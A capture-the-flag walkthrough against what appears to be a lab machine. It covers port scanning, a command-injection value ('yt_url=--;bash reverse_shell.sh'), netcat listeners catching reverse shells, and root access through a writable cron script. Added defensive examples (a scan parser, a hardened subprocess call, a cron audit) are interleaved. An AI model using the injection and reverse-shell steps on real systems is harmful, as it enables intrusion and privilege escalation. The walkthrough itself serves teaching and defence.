Let's perform a simple nmap scan against the target.
$ nmap -p- 10.10.162.57 -T5
Starting Nmap 7.92 ( https://nmap.org ) at 2024-02-08 12:08 IST
Warning: 10.10.162.57 giving up on port because retransmission cap hit (2).
Nmap scan report for 10.10.162.57
Host is up (0.13s latency).
Not shown: 64219 closed tcp ports (conn-refused), 1314 filtered tcp ports (no-response)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 657.11 seconds
We can now run an advanced scan against the open ports.
┌──(kunal㉿kali)-[~/tryhackme]
└─$ nmap -A -p 22,80 10.10.162.57
Starting Nmap 7.92 ( https://nmap.org ) at 2024-02-08 12:22 IST
Nmap scan report for 10.10.162.57
Host is up (0.13s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 65:1b:fc:74:10:39:df:dd:d0:2d:f0:53:1c:eb:6d:ec (RSA)
| 256 c4:28:04:a5:c3:b9:6a:95:5a:4d:7a:6e:46:e2:14:db (ECDSA)
|_ 256 ba:07:bb:cd:42:4a:f2:93:d1:05:d0:b3:4c:b1:d9:b1 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.4.29 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.65 seconds
There are two open ports with the following services:
Port  Service
22    ssh
80    http
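The port table above is copied by hand from the nmap output. As an added example (not part of the original writeup), the script below parses nmap's normal text output into records, renders the same two-column table, and additionally lists which open services announce a product version in their banner, which is the detail a defender would want to trim (for Apache, `ServerTokens Prod`). The sample input is a constructed excerpt of the -A scan shown above; the regexes and function names are this example's own.

```python
import re
from typing import NamedTuple, Optional


class PortRecord(NamedTuple):
    port: int
    proto: str
    state: str
    service: str
    version: str


# Constructed sample: the service-detection output shown above, trimmed to the
# lines this parser cares about (scan-report line, port lines, NSE script output).
SAMPLE_NMAP_OUTPUT = """\
Nmap scan report for 10.10.162.57
Host is up (0.13s latency).
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 65:1b:fc:74:10:39:df:dd:d0:2d:f0:53:1c:eb:6d:ec (RSA)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
"""

HOST_LINE = re.compile(r"^Nmap scan report for (\S+)")
# "22/tcp open ssh OpenSSH 7.6p1 ..." ; the VERSION column is optional because a
# plain -p- scan without -A prints only PORT STATE SERVICE.
PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)(?:\s+(.*))?$")


def parse_nmap_report(text: str):
    """Return (host, [PortRecord, ...]) from nmap's normal (-oN style) output."""
    host: Optional[str] = None
    records = []
    for line in text.splitlines():
        m = HOST_LINE.match(line)
        if m:
            host = m.group(1)
            continue
        m = PORT_LINE.match(line)
        if m:  # NSE script lines start with '|' and never match this pattern
            port, proto, state, service, version = m.groups()
            records.append(PortRecord(int(port), proto, state, service, (version or "").strip()))
    return host, records


def open_ports(records):
    return [r for r in records if r.state == "open"]


def banner_disclosures(records):
    """Open services whose banner carries a product version number. The exact
    version is what gets matched against known issues, so it is worth hiding."""
    return [(r.port, r.version) for r in open_ports(records) if re.search(r"\d+\.\d+", r.version)]


def port_table(records):
    """Render the two-column Port/Service table used in the writeup above."""
    lines = ["Port  Service"]
    for r in open_ports(records):
        lines.append(f"{r.port:<5} {r.service}")
    return "\n".join(lines)


if __name__ == "__main__":
    host, recs = parse_nmap_report(SAMPLE_NMAP_OUTPUT)
    print(f"host: {host}")
    print(port_table(recs))
    for port, version in banner_disclosures(recs):
        print(f"port {port} discloses version: {version}")
```

Feed it `nmap -oN` output (or a pasted terminal capture) and the same functions work on the shorter `-p-` listing, where the version column is simply empty.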
Now, we can use gobuster to perform directory brute forcing.
Note that in order for this command to work, there needs to be a TAB between wget and http instead of a SPACE.
Now, let's set up a nc listener.
$ nc -nlvp 9999
listening on [any] 9999 ...
Next, we execute reverse_shell.sh on the server by submitting the following as the yt_url value:
yt_url=--;bash reverse_shell.sh
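The `;` in that value works because the application hands the yt_url parameter to a shell, which treats `;` as a command separator. The following is an added example, not the application's code or anything from the original writeup: it contrasts the injectable pattern (request data interpolated into a shell command string) with the hardened form (validate, then pass the value as a single argv element with no shell), plus a small detection helper for request logs. `echo` stands in for the real download tool, and the input is a constructed value with a harmless marker command, so the block is safe to run.

```python
import subprocess
from urllib.parse import urlparse

# Constructed request value: a well-formed URL followed by a shell metacharacter
# and a harmless second command. The 'INJECTED' marker shows whether a second
# command actually ran.
CONSTRUCTED_INPUT = "https://example.invalid/video; echo INJECTED"


def fetch_vulnerable(yt_url: str) -> str:
    """The injectable pattern: request data pasted into a command string that a
    shell parses. ';' ends the first command, so whatever follows runs as well.
    'echo' plays the role of the downloader so this is harmless to execute."""
    completed = subprocess.run(
        f"echo fetching {yt_url}", shell=True, capture_output=True, text=True
    )
    return completed.stdout


def is_plausible_url(value: str) -> bool:
    """Cheap allow-list check: only http(s) with a host part. A value such as
    '--;bash something' fails because it has no scheme at all."""
    parts = urlparse(value)
    return parts.scheme in ("http", "https") and bool(parts.netloc)


def fetch_hardened(yt_url: str) -> str:
    """The fix: validate, then hand the value to the program as ONE argv element
    with no shell in between, so metacharacters reach the tool as literal text.
    '--' tells a real downloader that option parsing is over, so a value that
    starts with '-' cannot be read as a flag (echo simply prints it)."""
    if not is_plausible_url(yt_url):
        raise ValueError("rejected: expected an http(s) URL")
    completed = subprocess.run(
        ["echo", "fetching", "--", yt_url], capture_output=True, text=True
    )
    return completed.stdout


def looks_like_injection(value: str) -> bool:
    """Detection-side helper for request logs or a WAF rule: flags values that
    carry shell command separators or command-substitution syntax."""
    return any(marker in value for marker in (";", "|", "`", "$(", "\n"))


if __name__ == "__main__":
    print("vulnerable :", fetch_vulnerable(CONSTRUCTED_INPUT).splitlines())
    print("hardened   :", fetch_hardened(CONSTRUCTED_INPUT).splitlines())
    print("flagged    :", looks_like_injection(CONSTRUCTED_INPUT))
```

Note that the constructed input passes the URL check, so validation alone is not the defence here; the argv-list call is what keeps `; echo INJECTED` from ever being interpreted.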
Let's check back on our nc listener.
$ nc -nlvp 9999
listening on [any] 9999 ...
connect to [10.17.48.138] from (UNKNOWN) [10.10.162.57] 55344
bash: cannot set terminal process group (884): Inappropriate ioctl for device
bash: no job control in this shell
www-data@dmv:/var/www/html$
Let's list out the files in the current directory.
After around a minute, when the system next runs /var/www/html/tmp/clean.sh, we get our reverse shell with root privileges.
$ nc -nlvp 9998
listening on [any] 9998 ...
connect to [10.17.48.138] from (UNKNOWN) [10.10.162.57] 38570
bash: cannot set terminal process group (2098): Inappropriate ioctl for device
bash: no job control in this shell
root@dmv:/var/www/html/tmp#
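The root shell comes from a scheduled job running as root that executes a script a low-privilege user can modify. As an added example (not part of the original writeup), the audit below parses a system-crontab-format file (/etc/crontab or /etc/cron.d entries, which carry a user field), finds root jobs that reference absolute paths, and reports any script, or directory holding a script, that a non-root user could write. The crontab text and the world-writable script are constructed in a temporary directory so the check runs offline; the function names are this example's own.

```python
import os
import stat
import tempfile
from pathlib import Path


def parse_system_crontab(text: str):
    """Return (user, command) pairs from /etc/crontab or /etc/cron.d-style text.
    Per-user crontabs (crontab -l) have no user field and are not handled here."""
    jobs = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if "=" in line.split(None, 1)[0]:       # environment line such as PATH=...
            continue
        if line.startswith("@"):                 # @reboot / @daily shorthand
            parts, needed = line.split(None, 2), 3
        else:                                    # m h dom mon dow user command
            parts, needed = line.split(None, 6), 7
        if len(parts) == needed:
            jobs.append((parts[-2], parts[-1]))
    return jobs


def non_root_write_reasons(path: str):
    """Explain why a non-root user could modify `path`; [] means they cannot."""
    st = os.stat(path)
    reasons = []
    if st.st_uid != 0:
        reasons.append(f"owned by uid {st.st_uid}, not root")
    if st.st_mode & stat.S_IWOTH:
        reasons.append("world-writable")
    elif st.st_mode & stat.S_IWGRP and st.st_gid != 0:
        reasons.append(f"group-writable by gid {st.st_gid}")
    return reasons


def audit_crontab(text: str):
    """Flag root jobs whose script, or the directory containing it, a non-root
    user can write. A writable directory counts because the file can be replaced."""
    findings = []
    for user, command in parse_system_crontab(text):
        if user != "root":
            continue
        for token in command.split():
            if not token.startswith("/"):
                continue
            script = Path(token)
            for target in (script, script.parent):
                if target.exists():
                    reasons = non_root_write_reasons(str(target))
                    if reasons:
                        findings.append({"command": command, "target": str(target), "reasons": reasons})
    return findings


def build_demo_environment():
    """Constructed fixture: a throwaway directory holding a world-writable script
    and a crontab that runs it as root every minute, mirroring the clean.sh pattern."""
    workdir = tempfile.mkdtemp(prefix="cron-audit-demo-")
    script = Path(workdir) / "clean.sh"
    script.write_text("#!/bin/bash\nrm -rf /tmp/scratch/*\n")
    os.chmod(script, 0o777)                      # the misconfiguration under test
    crontab_text = (
        "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\n"
        "# constructed sample entries\n"
        f"*/1 * * * * root bash {script}\n"
        f"*/5 * * * * www-data bash {script}\n"   # same script, not root: not flagged
    )
    return crontab_text, str(script)


if __name__ == "__main__":
    crontab_text, _ = build_demo_environment()
    for f in audit_crontab(crontab_text):
        print(f"root job '{f['command']}': {f['target']} is {', '.join(f['reasons'])}")
```

On a real host, run `audit_crontab(Path("/etc/crontab").read_text())` and the same over each file in /etc/cron.d; the fix for anything it reports is root ownership and a mode without group or world write on both the script and its directory.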